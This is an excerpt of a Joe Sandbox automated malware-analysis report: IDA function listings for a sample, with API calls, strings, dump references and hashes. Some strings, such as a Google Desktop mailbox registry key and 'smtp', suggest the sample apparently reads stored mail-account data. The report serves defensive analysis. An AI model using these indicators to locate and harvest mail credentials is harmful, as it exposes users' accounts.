                                                                                        • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                        • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                        • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                      • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                      • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                      • String ID:
                                                                                      • API String ID: 2374668499-0
                                                                                      • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                      • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                      • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                      • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                      APIs
                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                      • String ID:
                                                                                      • API String ID: 2775283111-0
                                                                                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                      • API String ID: 885266447-2471937615
                                                                                      • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                      • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                      • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                      • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                      APIs
                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                      • String ID: smtp
                                                                                      • API String ID: 2625860049-60245459
                                                                                      • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                      • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                      APIs
                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                      • memset.MSVCRT ref: 00408258
                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                      Strings
                                                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$EnumOpenmemset
                                                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                      • API String ID: 2255314230-2212045309
                                                                                      • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                      • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FocusMessagePostmemset
                                                                                      • String ID: S_@$l
                                                                                      • API String ID: 3436799508-4018740455
                                                                                      • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                      • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscpy
                                                                                      • String ID: C^@$X$ini
                                                                                      • API String ID: 714388716-917056472
                                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                      APIs
                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                      • String ID: MS Sans Serif
                                                                                      • API String ID: 3492281209-168460110
                                                                                      • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                      • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName_strcmpimemset
                                                                                      • String ID: edit
                                                                                      • API String ID: 275601554-2167791130
                                                                                      • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                      • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: strlen$_mbscat
                                                                                      • String ID: 3CD
                                                                                      • API String ID: 3951308622-1938365332
                                                                                      • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                      • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: rows deleted
                                                                                      • API String ID: 2221118986-571615504
                                                                                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                      APIs
                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset
                                                                                      • String ID:
                                                                                      • API String ID: 1860491036-0
                                                                                      • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                      • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004048C2
                                                                                      • memset.MSVCRT ref: 004048D6
                                                                                      • memset.MSVCRT ref: 004048EA
                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 368790112-0
                                                                                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 368790112-0
                                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                      APIs
                                                                                      • __allrem.LIBCMT ref: 00425850
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                      • __allrem.LIBCMT ref: 00425933
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1992179935-0
                                                                                      • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                      • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                      • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                      • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                      APIs
                                                                                      Strings
                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                      • API String ID: 2221118986-515162456
                                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                      APIs
                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 3503910906-0
                                                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040C922
                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3798638045-0
                                                                                      • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                      • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                      APIs
                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                      • atoi.MSVCRT(?,00000000,?,75920A60,?,00000000), ref: 0040B619
                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                      • String ID:
                                                                                      • API String ID: 4107816708-0
                                                                                      • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                      • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
